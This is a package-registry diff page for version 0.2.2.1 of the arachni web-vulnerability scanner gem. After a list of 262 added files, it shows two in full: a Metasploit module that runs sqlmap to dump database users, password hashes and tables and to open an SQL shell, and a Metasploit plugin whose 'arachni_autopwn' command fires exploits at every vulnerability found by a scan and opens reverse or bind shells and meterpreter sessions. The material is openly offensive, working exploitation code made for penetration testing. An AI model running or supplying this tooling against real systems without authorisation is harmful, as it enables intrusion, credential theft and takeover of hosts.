RubyGems - arachni - Versions diffs - 0.2.2.1 - Mend

arachni 0.2.2.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (262) hide show

data/ACKNOWLEDGMENTS.md +14 -0
data/AUTHORS.md +6 -0
data/CHANGELOG.md +162 -0
data/CONTRIBUTORS.md +10 -0
data/EXPLOITATION.md +429 -0
data/HACKING.md +101 -0
data/LICENSE.md +341 -0
data/README.md +350 -0
data/Rakefile +86 -0
data/bin/arachni +22 -0
data/bin/arachni_web +77 -0
data/bin/arachni_xmlrpc +21 -0
data/bin/arachni_xmlrpcd +82 -0
data/bin/arachni_xmlrpcd_monitor +74 -0
data/conf/README.webui.yaml.txt +44 -0
data/conf/webui.yaml +11 -0
data/external/metasploit/LICENSE +24 -0
data/external/metasploit/modules/exploits/unix/webapp/arachni_exec.rb +142 -0
data/external/metasploit/modules/exploits/unix/webapp/arachni_path_traversal.rb +113 -0
data/external/metasploit/modules/exploits/unix/webapp/arachni_php_eval.rb +150 -0
data/external/metasploit/modules/exploits/unix/webapp/arachni_php_include.rb +141 -0
data/external/metasploit/modules/exploits/unix/webapp/arachni_sqlmap.rb +92 -0
data/external/metasploit/plugins/arachni.rb +536 -0
data/getoptslong.rb +241 -0
data/lib/anemone.rb +2 -0
data/lib/anemone/cookie_store.rb +35 -0
data/lib/anemone/core.rb +371 -0
data/lib/anemone/exceptions.rb +5 -0
data/lib/anemone/http.rb +144 -0
data/lib/anemone/page.rb +337 -0
data/lib/anemone/page_store.rb +160 -0
data/lib/anemone/storage.rb +34 -0
data/lib/anemone/storage/base.rb +75 -0
data/lib/anemone/storage/exceptions.rb +15 -0
data/lib/anemone/storage/mongodb.rb +89 -0
data/lib/anemone/storage/pstore.rb +50 -0
data/lib/anemone/storage/redis.rb +90 -0
data/lib/anemone/storage/tokyo_cabinet.rb +57 -0
data/lib/anemone/tentacle.rb +40 -0
data/lib/arachni.rb +16 -0
data/lib/audit_store.rb +346 -0
data/lib/component_manager.rb +293 -0
data/lib/component_options.rb +395 -0
data/lib/exceptions.rb +76 -0
data/lib/framework.rb +637 -0
data/lib/http.rb +809 -0
data/lib/issue.rb +302 -0
data/lib/module.rb +4 -0
data/lib/module/auditor.rb +455 -0
data/lib/module/base.rb +188 -0
data/lib/module/element_db.rb +158 -0
data/lib/module/key_filler.rb +87 -0
data/lib/module/manager.rb +87 -0
data/lib/module/output.rb +68 -0
data/lib/module/trainer.rb +240 -0
data/lib/module/utilities.rb +110 -0
data/lib/options.rb +547 -0
data/lib/parser.rb +2 -0
data/lib/parser/auditable.rb +522 -0
data/lib/parser/elements.rb +296 -0
data/lib/parser/page.rb +149 -0
data/lib/parser/parser.rb +717 -0
data/lib/plugin.rb +4 -0
data/lib/plugin/base.rb +110 -0
data/lib/plugin/manager.rb +162 -0
data/lib/report.rb +4 -0
data/lib/report/base.rb +119 -0
data/lib/report/manager.rb +92 -0
data/lib/rpc/xml/client/base.rb +71 -0
data/lib/rpc/xml/client/dispatcher.rb +49 -0
data/lib/rpc/xml/client/instance.rb +88 -0
data/lib/rpc/xml/server/base.rb +90 -0
data/lib/rpc/xml/server/dispatcher.rb +357 -0
data/lib/rpc/xml/server/framework.rb +206 -0
data/lib/rpc/xml/server/instance.rb +191 -0
data/lib/rpc/xml/server/module/manager.rb +46 -0
data/lib/rpc/xml/server/options.rb +124 -0
data/lib/rpc/xml/server/output.rb +299 -0
data/lib/rpc/xml/server/plugin/manager.rb +58 -0
data/lib/ruby.rb +5 -0
data/lib/ruby/object.rb +32 -0
data/lib/ruby/string.rb +74 -0
data/lib/ruby/xmlrpc/server.rb +27 -0
data/lib/spider.rb +200 -0
data/lib/typhoeus/request.rb +91 -0
data/lib/typhoeus/response.rb +34 -0
data/lib/ui/cli/cli.rb +744 -0
data/lib/ui/cli/output.rb +279 -0
data/lib/ui/web/log.rb +82 -0
data/lib/ui/web/output_stream.rb +94 -0
data/lib/ui/web/report_manager.rb +222 -0
data/lib/ui/web/server.rb +903 -0
data/lib/ui/web/server/db/placeholder +0 -0
data/lib/ui/web/server/public/banner.png +0 -0
data/lib/ui/web/server/public/bodybg-small.png +0 -0
data/lib/ui/web/server/public/bodybg.png +0 -0
data/lib/ui/web/server/public/css/smoothness/images/pbar-ani.gif +0 -0
data/lib/ui/web/server/public/css/smoothness/images/ui-bg_flat_0_aaaaaa_40x100.png +0 -0
data/lib/ui/web/server/public/css/smoothness/images/ui-bg_flat_75_ffffff_40x100.png +0 -0
data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_55_fbf9ee_1x400.png +0 -0
data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_65_ffffff_1x400.png +0 -0
data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_75_dadada_1x400.png +0 -0
data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_75_e6e6e6_1x400.png +0 -0
data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_95_fef1ec_1x400.png +0 -0
data/lib/ui/web/server/public/css/smoothness/images/ui-bg_highlight-soft_75_cccccc_1x100.png +0 -0
data/lib/ui/web/server/public/css/smoothness/images/ui-icons_222222_256x240.png +0 -0
data/lib/ui/web/server/public/css/smoothness/images/ui-icons_2e83ff_256x240.png +0 -0
data/lib/ui/web/server/public/css/smoothness/images/ui-icons_454545_256x240.png +0 -0
data/lib/ui/web/server/public/css/smoothness/images/ui-icons_888888_256x240.png +0 -0
data/lib/ui/web/server/public/css/smoothness/images/ui-icons_cd0a0a_256x240.png +0 -0
data/lib/ui/web/server/public/css/smoothness/jquery-ui-1.8.9.custom.css +573 -0
data/lib/ui/web/server/public/favicon.ico +0 -0
data/lib/ui/web/server/public/footer.jpg +0 -0
data/lib/ui/web/server/public/icons/error.png +0 -0
data/lib/ui/web/server/public/icons/info.png +0 -0
data/lib/ui/web/server/public/icons/ok.png +0 -0
data/lib/ui/web/server/public/icons/status.png +0 -0
data/lib/ui/web/server/public/js/jquery-1.4.4.min.js +167 -0
data/lib/ui/web/server/public/js/jquery-ui-1.8.9.custom.min.js +781 -0
data/lib/ui/web/server/public/logo.png +0 -0
data/lib/ui/web/server/public/nav-left.jpg +0 -0
data/lib/ui/web/server/public/nav-right.jpg +0 -0
data/lib/ui/web/server/public/nav-selected-left.jpg +0 -0
data/lib/ui/web/server/public/nav-selected-right.jpg +0 -0
data/lib/ui/web/server/public/reports/placeholder +1 -0
data/lib/ui/web/server/public/sidebar-bottom.jpg +0 -0
data/lib/ui/web/server/public/sidebar-h4.jpg +0 -0
data/lib/ui/web/server/public/sidebar-top.jpg +0 -0
data/lib/ui/web/server/public/spider.png +0 -0
data/lib/ui/web/server/public/style.css +604 -0
data/lib/ui/web/server/tmp/placeholder +0 -0
data/lib/ui/web/server/views/dispatcher.erb +85 -0
data/lib/ui/web/server/views/dispatcher_error.erb +14 -0
data/lib/ui/web/server/views/error.erb +1 -0
data/lib/ui/web/server/views/flash.erb +18 -0
data/lib/ui/web/server/views/home.erb +14 -0
data/lib/ui/web/server/views/instance.erb +213 -0
data/lib/ui/web/server/views/layout.erb +95 -0
data/lib/ui/web/server/views/log.erb +40 -0
data/lib/ui/web/server/views/modules.erb +71 -0
data/lib/ui/web/server/views/options.erb +23 -0
data/lib/ui/web/server/views/output_results.erb +51 -0
data/lib/ui/web/server/views/plugins.erb +42 -0
data/lib/ui/web/server/views/report_formats.erb +30 -0
data/lib/ui/web/server/views/reports.erb +55 -0
data/lib/ui/web/server/views/settings.erb +120 -0
data/lib/ui/web/server/views/welcome.erb +38 -0
data/lib/ui/xmlrpc/dispatcher_monitor.rb +204 -0
data/lib/ui/xmlrpc/xmlrpc.rb +843 -0
data/logs/placeholder +0 -0
data/metamodules/autothrottle.rb +74 -0
data/metamodules/timeout_notice.rb +118 -0
data/metamodules/uniformity.rb +98 -0
data/modules/audit/code_injection.rb +136 -0
data/modules/audit/code_injection_timing.rb +115 -0
data/modules/audit/code_injection_timing/payloads.txt +4 -0
data/modules/audit/csrf.rb +301 -0
data/modules/audit/ldapi.rb +103 -0
data/modules/audit/ldapi/errors.txt +26 -0
data/modules/audit/os_cmd_injection.rb +103 -0
data/modules/audit/os_cmd_injection/payloads.txt +2 -0
data/modules/audit/os_cmd_injection_timing.rb +104 -0
data/modules/audit/os_cmd_injection_timing/payloads.txt +3 -0
data/modules/audit/path_traversal.rb +141 -0
data/modules/audit/response_splitting.rb +105 -0
data/modules/audit/rfi.rb +193 -0
data/modules/audit/sqli.rb +120 -0
data/modules/audit/sqli/regexp_ids.txt +90 -0
data/modules/audit/sqli_blind_rdiff.rb +321 -0
data/modules/audit/sqli_blind_timing.rb +103 -0
data/modules/audit/sqli_blind_timing/payloads.txt +51 -0
data/modules/audit/trainer.rb +89 -0
data/modules/audit/unvalidated_redirect.rb +90 -0
data/modules/audit/xpath.rb +104 -0
data/modules/audit/xpath/errors.txt +26 -0
data/modules/audit/xss.rb +99 -0
data/modules/audit/xss_event.rb +134 -0
data/modules/audit/xss_path.rb +125 -0
data/modules/audit/xss_script_tag.rb +112 -0
data/modules/audit/xss_tag.rb +112 -0
data/modules/audit/xss_uri.rb +125 -0
data/modules/recon/allowed_methods.rb +104 -0
data/modules/recon/backdoors.rb +131 -0
data/modules/recon/backdoors/filenames.txt +16 -0
data/modules/recon/backup_files.rb +177 -0
data/modules/recon/backup_files/extensions.txt +28 -0
data/modules/recon/common_directories.rb +138 -0
data/modules/recon/common_directories/directories.txt +265 -0
data/modules/recon/common_files.rb +138 -0
data/modules/recon/common_files/filenames.txt +17 -0
data/modules/recon/directory_listing.rb +171 -0
data/modules/recon/grep/captcha.rb +62 -0
data/modules/recon/grep/credit_card.rb +85 -0
data/modules/recon/grep/cvs_svn_users.rb +73 -0
data/modules/recon/grep/emails.rb +59 -0
data/modules/recon/grep/html_objects.rb +53 -0
data/modules/recon/grep/private_ip.rb +54 -0
data/modules/recon/grep/ssn.rb +53 -0
data/modules/recon/htaccess_limit.rb +82 -0
data/modules/recon/http_put.rb +95 -0
data/modules/recon/interesting_responses.rb +118 -0
data/modules/recon/unencrypted_password_forms.rb +119 -0
data/modules/recon/webdav.rb +126 -0
data/modules/recon/xst.rb +107 -0
data/path_extractors/anchors.rb +35 -0
data/path_extractors/forms.rb +35 -0
data/path_extractors/frames.rb +38 -0
data/path_extractors/generic.rb +39 -0
data/path_extractors/links.rb +35 -0
data/path_extractors/meta_refresh.rb +39 -0
data/path_extractors/scripts.rb +37 -0
data/path_extractors/sitemap.rb +31 -0
data/plugins/autologin.rb +137 -0
data/plugins/content_types.rb +90 -0
data/plugins/cookie_collector.rb +99 -0
data/plugins/form_dicattack.rb +185 -0
data/plugins/healthmap.rb +94 -0
data/plugins/http_dicattack.rb +133 -0
data/plugins/metamodules.rb +118 -0
data/plugins/proxy.rb +248 -0
data/plugins/proxy/server.rb +66 -0
data/plugins/waf_detector.rb +184 -0
data/profiles/comprehensive.afp +74 -0
data/profiles/full.afp +75 -0
data/reports/afr.rb +59 -0
data/reports/ap.rb +55 -0
data/reports/html.rb +179 -0
data/reports/html/default.erb +967 -0
data/reports/metareport.rb +139 -0
data/reports/metareport/arachni_metareport.rb +174 -0
data/reports/plugin_formatters/html/content_types.rb +82 -0
data/reports/plugin_formatters/html/cookie_collector.rb +66 -0
data/reports/plugin_formatters/html/form_dicattack.rb +54 -0
data/reports/plugin_formatters/html/healthmap.rb +76 -0
data/reports/plugin_formatters/html/http_dicattack.rb +54 -0
data/reports/plugin_formatters/html/metaformatters/timeout_notice.rb +65 -0
data/reports/plugin_formatters/html/metaformatters/uniformity.rb +71 -0
data/reports/plugin_formatters/html/metamodules.rb +93 -0
data/reports/plugin_formatters/html/waf_detector.rb +54 -0
data/reports/plugin_formatters/stdout/content_types.rb +73 -0
data/reports/plugin_formatters/stdout/cookie_collector.rb +61 -0
data/reports/plugin_formatters/stdout/form_dicattack.rb +52 -0
data/reports/plugin_formatters/stdout/healthmap.rb +72 -0
data/reports/plugin_formatters/stdout/http_dicattack.rb +53 -0
data/reports/plugin_formatters/stdout/metaformatters/timeout_notice.rb +55 -0
data/reports/plugin_formatters/stdout/metaformatters/uniformity.rb +68 -0
data/reports/plugin_formatters/stdout/metamodules.rb +89 -0
data/reports/plugin_formatters/stdout/waf_detector.rb +48 -0
data/reports/plugin_formatters/xml/content_types.rb +91 -0
data/reports/plugin_formatters/xml/cookie_collector.rb +70 -0
data/reports/plugin_formatters/xml/form_dicattack.rb +57 -0
data/reports/plugin_formatters/xml/healthmap.rb +82 -0
data/reports/plugin_formatters/xml/http_dicattack.rb +57 -0
data/reports/plugin_formatters/xml/metaformatters/timeout_notice.rb +67 -0
data/reports/plugin_formatters/xml/metaformatters/uniformity.rb +82 -0
data/reports/plugin_formatters/xml/metamodules.rb +91 -0
data/reports/plugin_formatters/xml/waf_detector.rb +58 -0
data/reports/stdout.rb +182 -0
data/reports/txt.rb +77 -0
data/reports/xml.rb +231 -0
data/reports/xml/buffer.rb +98 -0
metadata +516 -0

data/external/metasploit/modules/exploits/unix/webapp/arachni_sqlmap.rb ADDED

@@ -0,0 +1,92 @@
+require 'msf/core'
+class Metasploit3 < Msf::Auxiliary
+	include Msf::Exploit::Remote::HttpClient
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'          => 'Arachni SQLMAP SQL Injection External Module',
+			'Description'   => %q{
+				This module is designed to be used with the Arachni plug-in.
+				From the original:
+					This module launches an sqlmap session.
+				sqlmap is an automatic SQL injection tool developed in Python.
+				Its goal is to detect and take advantage of SQL injection
+				vulnerabilities on web applications. Once it detects one
+				or more SQL injections on the target host, the user can
+				choose among a variety of options to perform an extensive
+				back-end database management system fingerprint, retrieve
+				DBMS session user and database, enumerate users, password
+				hashes, privileges, databases, dump entire or user
+				specific DBMS tables/columns, run his own SQL SELECT
+				statement, read specific files on the file system and much
+				more.
+			},
+			'Author'        => [
+				'Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>', # modified to work with the Arachni plug-in
+				'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' # original module: auxiliary/scanner/http/sqlmap.rb
+			],
+			'License'       => BSD_LICENSE,
+			'Version'       => '$Revision: 9212 $',
+			'References'    =>
+				[
+					['URL', 'http://github.com/Zapotek/arachni'],
+					['URL', 'http://sqlmap.sourceforge.net'],
+				]
+			))
+		register_options(
+			[
+				OptString.new('METHOD', [ true,  "HTTP Method", 'GET' ]),
+				OptString.new('PATH', [ true,  "The path to test for SQL injection", 'index.php' ]),
+				OptString.new('GET', [ false, "HTTP GET query", 'id=1' ]),
+				OptString.new('POST', [ false, "The data string to be sent through POST", '' ]),
+				OptString.new('COOKIES', [ false, "", '' ]),
+				OptString.new('OPTS', [ false,  "The sqlmap options to use", '--users --time-test --passwords --dbs --sql-shell -v 0' ]),
+				OptPath.new('SQLMAP_PATH', [ true,  "The sqlmap >= 0.8 full path ", 'sqlmap' ]),
+			], self.class)
+	end
+	def run
+		sqlmap = datastore['SQLMAP_PATH']
+		if not sqlmap
+			print_error("The sqlmap script could not be found")
+			return
+		end
+		data   = datastore['POST'].gsub( 'XXinjectionXX', '' )
+		method = datastore['METHOD'].upcase
+		sqlmap_url  = (datastore['SSL'] ? "https" : "http")
+		sqlmap_url += "://" + datastore['RHOST'] + ":" + datastore['RPORT']
+		sqlmap_url += "/" + datastore['PATH']
+		if method == "GET"
+			sqlmap_url += '?' + datastore['GET'].gsub( 'XXinjectionXX', '' )
+		end
+		cmd  = sqlmap + ' -u \'' + sqlmap_url + '\''
+		cmd += ' --method ' + method
+		cmd += ' ' + datastore['OPTS']
+		cmd += ' --cookie \'' + datastore['COOKIES'].to_s + '\'' if datastore['COOKIES']
+		if not data.empty?
+			cmd += ' --data \'' + data + '\''
+		end
+		if datastore['BATCH'] == true
+			cmd += ' --batch'
+		end
+		print_status("exec: #{cmd}")
+		system( cmd )
+	end
+end

data/external/metasploit/plugins/arachni.rb ADDED

@@ -0,0 +1,536 @@
+#
+# $Id$
+# $Revision$
+#
+require 'pp'
+module Msf
+class Plugin::Arachni < Msf::Plugin
+	###
+	#
+	# This class implements an exploitation platform for web app vulnerabilities
+	# discovered by the Arachni WebApp Security Scaner Framework
+	# (http://github.com/Zapotek/arachni)
+	#
+	###
+	class ArachniCommandDispatcher
+		include Msf::Ui::Console::CommandDispatcher
+		#
+		# The dispatcher's name.
+		#
+		def name
+			"Arachni"
+		end
+		#
+		# Returns the hash of commands supported by this dispatcher.
+		#
+		def commands
+			{
+				"arachni_load"          => "Loads an ArachniMetareport file (.afr.msf).",
+				"arachni_autopwn"       => "Tries to exploit all vulnerabilities.",
+				"arachni_list_exploits" => "Lists all matching exploit modules.",
+				"arachni_list_vulns"    => "Lists all vulnerabilities.",
+				"arachni_list_all"      => "Same as running 'arachni_list_exploits' & 'arachni_list_vulns'.",
+				"arachni_killall"       => "Kills all running/pending pwn-jobs.",
+				"arachni_manual"        => "Prepares a vulnerability for manual exploitation.",
+			}
+		end
+		#
+		# This method loads a metareport file and lists all
+		# exploitable vulnerabilities and suitable exploits.
+		#
+		def cmd_arachni_load( *args )
+			metareport = args[0]
+			if !metareport
+				print_error( "Usage: arachni_load [metareport]" )
+				return
+			end
+			if !File.exist?( metareport )
+				print_error( "File '#{metareport}' doesn't exist." )
+				return
+			end
+			print_status( "Loading report..." )
+			@vulns    ||= []
+			@exploits ||= []
+			YAML.load( IO.read( metareport ) ).each do |vuln|
+				data = { }
+				vuln.ivars.keys.each do |k|
+					data[k.to_sym] = vuln.ivars[k]
+				end
+				begin
+					# the MSF doesn't much like hostnames, resolve to an IP address
+					# there's probably a beter way to do it...
+					host = Rex::Socket.gethostbyname( data[:host] ).pop
+					data[:host] = Rex::Socket.addr_ntoa( host )
+					@exploits << data[:exploit]
+					@vulns << data
+				rescue
+					next
+				end
+			end
+			@vulns.uniq!
+			print_status( "Loaded #{@vulns.size} vulnerabilities." )
+			print_line
+			cmd_arachni_list_exploits
+			cmd_arachni_list_vulns
+			print_line
+			print_status( 'Done!' )
+		end
+		#
+		# Exploits all vulnerabilities
+		#
+		def cmd_arachni_autopwn( *args )
+			opts = {
+				:meterpreter => false,
+				:reverse     => false,
+				:bind        => true,
+				:quiet       => false,
+				:regexp      => nil
+			}
+			args.push( "-h" ) if args.empty?
+			while( !args.empty? && flag = args.shift )
+				case flag
+				when '-h', '--help', '?'
+					help()
+					return
+				when '-r'
+					opts[:reverse] = true
+				when '-b'
+					opts[:bind] = true
+				when '-m'
+					opts[:meterpreter] = true
+				when '-q'
+					opts[:quiet] = true
+				when '-x'
+					opts[:regexp] = Regexp.new( args.shift.to_s )
+				when '-a'
+					opts[:regexp] = /.*/
+				else
+					print_error( 'Unknown option: ' + flag.to_s )
+					return
+				end
+			end
+			if running?
+				print_error( "#{@jobs.size} pwn-jobs haven't finished yet." )
+				print_error( 'To kill them run: \'arachni_killall\'' )
+				return
+			end
+			if !@vulns
+				print_error( 'You must first load a report using \'arachni_load\'.' )
+				return
+			end
+			if @vulns.empty?
+				print_error( 'No vulnerabilities to exploit.' )
+			end
+			print_status( 'Running pwn-jobs...' )
+			print_line
+			@jobs ||= []
+			@vulns.each do |vuln|
+				next if opts[:regexp] && !(vuln[:exploit] =~ opts[:regexp])
+				@jobs << Thread.new( vuln, opts ) do |vulnerability, opts|
+					exploit( vulnerability, opts )
+				end
+			end
+			# Wait on all the jobs we just spawned
+			while( !@jobs.empty? )
+				# All running jobs are stored in framework.jobs.  If it's
+				# not in this list, it must have completed.
+				@jobs.delete_if { |j| !j.alive? }
+				print_status( "[#{framework.sessions.length} established sessions]):" +
+					" Waiting on #{@jobs.length} launched modules to finish execution..." )
+				::IO.select( nil, nil, nil, 5.0 )
+			end
+			print_line
+			print_status( "The autopwn command has completed with #{framework.sessions.length} sessions" )
+			if( framework.sessions.length > 0 )
+				print_status( "Enter sessions -i [ID] to interact with a given session ID" )
+				print_status( "" )
+				print_status( "=" * 80 )
+				driver.run_single( "sessions -l -v" )
+				print_status( "=" * 80 )
+			end
+		end
+		#
+		# Decides whether or not any pwn-jobs are running
+		#
+		def running?
+			return @jobs && !@jobs.empty?
+		end
+		#
+		# Kills all pwn-jobs
+		#
+		def cmd_arachni_killall
+			if !@jobs
+				print_error( "The pwn-job queue hasn't been initialised yet." )
+				return
+			end
+			if @jobs.empty?
+				print_info( "The pwn-job queue is empty." )
+				return
+			end
+			cnt = 0
+			@jobs.each do |j|
+				cnt +=1 if Thread.kill( j )
+			end
+			@jobs.clear
+			print_status( "Killed #{cnt} pwn-jobs." )
+		end
+		#
+		# Lists suitable exploits and vulnerabilities
+		#
+		def cmd_arachni_list_all
+			cmd_arachni_list_exploits
+			cmd_arachni_list_vulns
+		end
+		#
+		# Lists all vulnerabilities
+		#
+		def cmd_arachni_list_vulns
+			if !@vulns
+				print_error( 'You must first load a report using \'arachni_load\'.' )
+				return
+			end
+			if @vulns.empty?
+				print_error( 'No vulnerabilities to list.' )
+			end
+			@vulns.uniq!
+			vuln_table = Rex::Ui::Text::Table.new(
+			'Header'  => "Vulnerabilities",
+			'Indent'  => 4,
+			'Columns' => [
+				"ID",
+				"Host",
+				"Path",
+				"Name",
+				"Method",
+				"Params",
+				"Exploit"
+				]
+			)
+			indent = ""
+			@vulns.each_with_index do |vuln, idx|
+				vuln_table << [ idx + 1, vuln[:host], vuln[:path], vuln[:name],
+					vuln[:method], vuln[:params].to_s, vuln[:exploit] ]
+			end
+			print_line( "\n#{vuln_table.to_s}\n" )
+		end
+		#
+		# Prepares a vulnerability for manual exploitation by ID
+		#
+		def cmd_arachni_manual( *args )
+			idx = args[0]
+			if !idx
+				print_error( 'Usage: arachni_manual [ID]' )
+				print_line( 'Use \'arachni_vulns\' to see all available IDs.' )
+				return
+			end
+			idx = idx.to_i
+			idx -= 1
+			if !@vulns
+				print_error( 'You must first load a report using \'arachni_load\'.' )
+				return
+			end
+			if @vulns.empty?
+				print_error( 'No vulnerabilities to exploit.' )
+			end
+			vuln = @vulns[idx]
+			if !vuln
+				print_error( "Invalid index: #{idx}" )
+				cmd_arachni_list_vulns
+				return
+			end
+			print_status( "Using #{vuln[:exploit]} ." )
+			driver.run_single( "use #{vuln[:exploit]}" )
+			prep_datastore( vuln ).each do |k, v|
+				v = '' if !v
+				driver.run_single( "set #{k} #{v}" )
+			end
+			print_status( "Done!" )
+			begin
+				sploit = framework.modules.create( vuln[:exploit] )
+				driver.run_single( "set PAYLOAD #{payload( sploit, vuln )}" )
+				payload_table = Rex::Ui::Text::Table.new(
+					'Header'  => "Compatible payloads",
+					'Indent'  => 4,
+					'Columns' => [ "Name", "Description" ]
+				)
+				sploit.compatible_payloads.each do |payload|
+					payload_table << [ payload[0], payload[1].new.description ]
+				end
+			rescue
+				print_line( "\n#{payload_table.to_s}\n" )
+				print_line( "Use: set PAYLOAD <name>" )
+			end
+		end
+		#
+		# Lists all suitable exploits
+		#
+		def cmd_arachni_list_exploits
+			if !@exploits
+				print_error( 'You must first load a report using \'arachni_load\'.' )
+				return
+			end
+			if @exploits.empty?
+				print_error( 'No exploits to list.' )
+			end
+			@exploits.uniq!
+			exploit_table = Rex::Ui::Text::Table.new(
+			'Header'  => "Unique exploits",
+			'Indent'  => 4,
+			'Columns' => [
+				"ID", "Exploit", "Description"
+				]
+			)
+			@exploits.each_with_index do |ex, idx|
+				desc = framework.modules.create( ex ).description
+				exploit_table << [idx + 1, ex, desc ]
+			end
+			print_line( "\n#{exploit_table.to_s}\n" )
+		end
+		def help
+			print_status("Usage: arachni_autopwn [options]")
+			print_line("\t-h          Display this help text")
+			print_line("\t-x [regexp] Only run modules whose name matches the regex")
+			print_line("\t-a          Launch exploits against all matched targets")
+			# print_line("\t-s          Stop on first shell")
+			print_line("\t-r          Use a reverse connect shell")
+			print_line("\t-b          Use a bind shell on a random port (default)")
+			print_line("\t-m          Use a meterpreter shell (if possible)")
+			print_line("\t-q          Disable exploit module output")
+			print_line("")
+		end
+		#
+		# Exploits a vulnerability based on user opts
+		#
+		def exploit( vuln, opts )
+			sploit =  framework.modules.create( vuln[:exploit] )
+			print_status( "Running #{sploit.fullname}" )
+			sploit.datastore.merge!( prep_datastore( vuln ) )
+			sploit.exploit_simple(
+			'Payload'        => payload( sploit, opts ),
+			'LocalInput'     => opts[:quiet] ? nil : driver.input,
+			'LocalOutput'    => opts[:quiet] ? nil : driver.output,
+			'RunAsJob'       => false
+			)
+		end
+		#
+		# Determines the most suitable payload for an exploit based on user opts
+		#
+		def payload( sploit, opts )
+			# choose best payloads for a reverse shells
+			if opts[:reverse]
+				# choose best payloads for a reverse meterpreter shell
+				if opts[:meterpreter]
+					payloads = {
+						'exploit/unix/webapp/arachni_php_include' => 'php/meterpreter/reverse_tcp',
+						# arachni_exec doesn't have a compatiblem meterpreter shell...
+						'exploit/unix/webapp/arachni_exec'        => 'cmd/unix/reverse_perl',
+						'exploit/unix/webapp/arachni_php_eval'    => 'php/meterpreter/reverse_tcp',
+					}
+				# choose best payloads for a standard reverse shell
+				else
+					payloads = {
+						'exploit/unix/webapp/arachni_php_include' => 'generic/shell_reverse_tcp',
+						'exploit/unix/webapp/arachni_exec'        => 'cmd/unix/reverse_perl',
+						'exploit/unix/webapp/arachni_php_eval'    => 'generic/shell_reverse_tcp',
+					}
+				end
+			# choose best payloads for a bind shell (default)
+			else
+				# choose best payloads for a bind meterpreter shell
+				if opts[:meterpreter]
+					payloads = {
+						'exploit/unix/webapp/arachni_php_include' => 'php/meterpreter/bind_tcp',
+						'exploit/unix/webapp/arachni_exec'        => 'cmd/unix/reverse_perl',
+						'exploit/unix/webapp/arachni_php_eval'    => 'php/meterpreter/bind_tcp',
+					}
+				# choose best payloads for a standard bind shell
+				else
+					payloads = {
+						'exploit/unix/webapp/arachni_php_include' => 'php/bind_php',
+						'exploit/unix/webapp/arachni_exec'        => 'cmd/unix/bind_perl',
+						'exploit/unix/webapp/arachni_php_eval'    => 'php/bind_php',
+					}
+				end
+			end
+			return payloads[sploit.fullname]
+		end
+		#
+		# Prepares a hash to be used as a module/framework datastore
+		# based on the provided vulnerability
+		#
+		def prep_datastore( vuln )
+			cvuln = vuln.dup
+			uri  = cvuln[:host]
+			uri += cvuln[:path]  if cvuln[:path]
+			uri += cvuln[:query] if cvuln[:query]
+			print_status( "Preparing datastore for '#{cvuln[:name]}' vulnerability @ #{uri} ..." )
+			datastore = {}
+			datastore["SRVHOST"] = "127.0.0.1"
+			datastore["SRVPORT"] = ( rand( 9999 ) + 6000 ).to_s
+			datastore["RHOST"]   = cvuln[:host]
+			datastore["RPORT"]   = cvuln[:port]
+			datastore["LHOST"]   = "127.0.0.1"
+			datastore["LPORT"]   = ( rand( 9999 ) + 5000 ).to_s
+			datastore["SSL"]     = cvuln[:ssl]
+			case cvuln[:method]
+			when 'GET'
+				datastore["GET"]  = hash_to_query( cvuln[:params] )
+			when 'POST'
+				datastore["POST"] = hash_to_query( cvuln[:params] )
+			end
+			datastore["METHOD"]   = cvuln[:method]
+			datastore["COOKIES"]  = cvuln[:headers]['cookie']
+			headers = cvuln[:headers]
+			headers.delete( 'cookie' )
+			datastore["HEADERS"] = hash_to_query( headers, '::' )
+			datastore["PATH"]    = cvuln[:path]
+			return datastore.dup
+		end
+		#
+		# Splits and converts a query string into a hash
+		#
+		def hash_to_query( hash, glue = '&' )
+			return hash.to_a.map do |item|
+				next if !item[1]
+				"#{item[0]}=#{item[1]}"
+			end.reject do |i| !i end.join( glue )
+		end
+	end
+	def initialize( framework, opts )
+		super
+		# console dispatcher commands.
+		add_console_dispatcher( ArachniCommandDispatcher )
+	end
+	def cleanup
+		remove_console_dispatcher( 'Arachni' )
+	end
+	def name
+		"arachni"
+	end
+	def desc
+		%q{Provides an exploitation platform for web app vulnerabilities
+		discovered by the Arachni WebApp Security Scaner Framework
+		(http://github.com/Zapotek/arachni)}
+	end
+end
+end